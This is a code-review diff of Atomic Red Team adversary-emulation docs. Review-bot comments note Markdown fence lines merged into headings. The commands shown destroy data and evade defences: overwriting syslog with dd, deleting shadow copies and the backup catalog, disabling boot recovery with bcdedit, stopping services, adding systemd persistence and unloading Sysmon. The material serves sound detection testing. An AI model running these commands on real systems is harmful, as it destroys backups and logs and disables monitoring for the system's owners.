@@ -95,8 +91,7 @@ To stop the test, break the command with CTRL/CMD+C.
| overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
| file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
dd of=#{file_to_overwrite} if=#{overwrite_source}
```
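Review bot: all five hunks in T1485.md (-27 `vssadmin.exe`, -40 `wbadmin.exe`, -54 `bcdedit.exe`, -74 `sdelete.exe`, -95 `dd of=... if=...`) carry the same heading/fence merge and will stop rendering their commands as code. The `bcdedit.exe /set {default} ...` pair in particular reads as two prose lines once unfenced, with the `{default}` braces and the line break lost. Restore the separate fence lines from the `-` side.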
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index 3238fd91..6588ced5 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -26,8 +26,7 @@ Stops a specified service using the sc.exe command.
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe stop #{service_name}
```
@@ -44,8 +43,7 @@ Stops a specified service using the net.exe command.
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net.exe stop #{service_name}
```
@@ -63,8 +61,7 @@ This technique was used by WannaCry.
|------|-------------|------|---------------|
| process_name | Name of a process to kill | String | sqlwriter.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
taskkill.exe /f /im #{process_name}
```
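Review bot: the three T1489.md hunks (-26 `sc.exe stop`, -44 `net.exe stop`, -63 `taskkill.exe /f /im`) all merge the opening fence into the heading line (`+#### Run it with `command_prompt`! ````). Restore the heading and fence as two lines so the `#{service_name}` and `#{process_name}` placeholders remain inside code blocks.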
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 6bec9449..e9102c22 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -28,8 +28,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe delete shadows /all /quiet
```
@@ -41,8 +40,7 @@ Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe shadowcopy delete
```
@@ -54,8 +52,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin.exe delete catalog -quiet
```
@@ -68,8 +65,7 @@ This technique is used by numerous ransomware families and APT malware such as O
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
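Review bot: the four T1490.md hunks (-28 `vssadmin.exe delete shadows`, -41 `wmic.exe shadowcopy delete`, -54 `wbadmin.exe delete catalog`, -68 `bcdedit.exe`) have the fence folded into the heading, the same defect as in T1485.md. Restore the separate fence lines from the removed `-` side in each hunk.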
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 5f2865d3..2aa909c4 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -18,8 +18,7 @@ End the test by using CTRL/CMD+C to break.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
yes > /dev/null
```
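Review bot: the single hunk at -18 in T1496.md replaces the heading and fence lines with `+#### Run it with `bash`! ````, leaving `yes > /dev/null` unfenced; the `>` at the start of a run of text is exactly the kind of character Markdown reinterprets. Keep the fence on its own line as in the removed lines.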
diff --git a/atomics/T1501/T1501.md b/atomics/T1501/T1501.md
index 94e49ede..7577b808 100644
--- a/atomics/T1501/T1501.md
+++ b/atomics/T1501/T1501.md
@@ -39,8 +39,7 @@ This test creates a Systemd service unit file and enables it as a service.
| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
@@ -74,8 +73,7 @@ This cleans up the remnants of the SystemD service unit file creation test.
| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
systemctl stop #{systemd_service_file}
systemctl disable #{systemd_service_file}
rm -rf #{systemd_service_path}/#{systemd_service_file}
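Review bot: both T1501.md hunks (-39 and -74) merge the opening fence into the `#### Run it with `bash`!` heading. The first hunk is the worst case in this patch: the `echo "[Unit]" > ...` / `echo "Description=..." >> ...` lines that write the unit file will render as prose, with `[Unit]` parsed as a Markdown link reference and the `>` redirections subject to blockquote handling, so the file a reader reconstructs will not match what the test writes. Restore the separate fence line in both hunks.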
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5215f879..5f39b7cf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5712,6 +5712,7 @@ defense-evasion:
default: SysmonDrv
executor:
name: command_prompt
+ elevation_required: true
command: 'fltmc.exe unload #{sysmon_driver}
'
@@ -5740,6 +5741,7 @@ defense-evasion:
- windows
executor:
name: command_prompt
+ elevation_required: true
command: 'sysmon -u
'
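Review bot: the two `+ elevation_required: true` additions in index.yaml (under the `fltmc.exe unload #{sysmon_driver}` and `sysmon -u` executors) are correct in substance, since both commands need administrator rights, but the diff as shown here carries no leading whitespace, so it is not verifiable from this view that the new key sits at the same indentation level as the neighbouring `name: command_prompt` line; a YAML key at the wrong depth would silently land outside the `executor` mapping. Please confirm the indentation in the raw file. Also, no corresponding change to the generated markdown for those two tests appears in this patch; if the documentation template renders the elevation flag, those files should be regenerated in the same change.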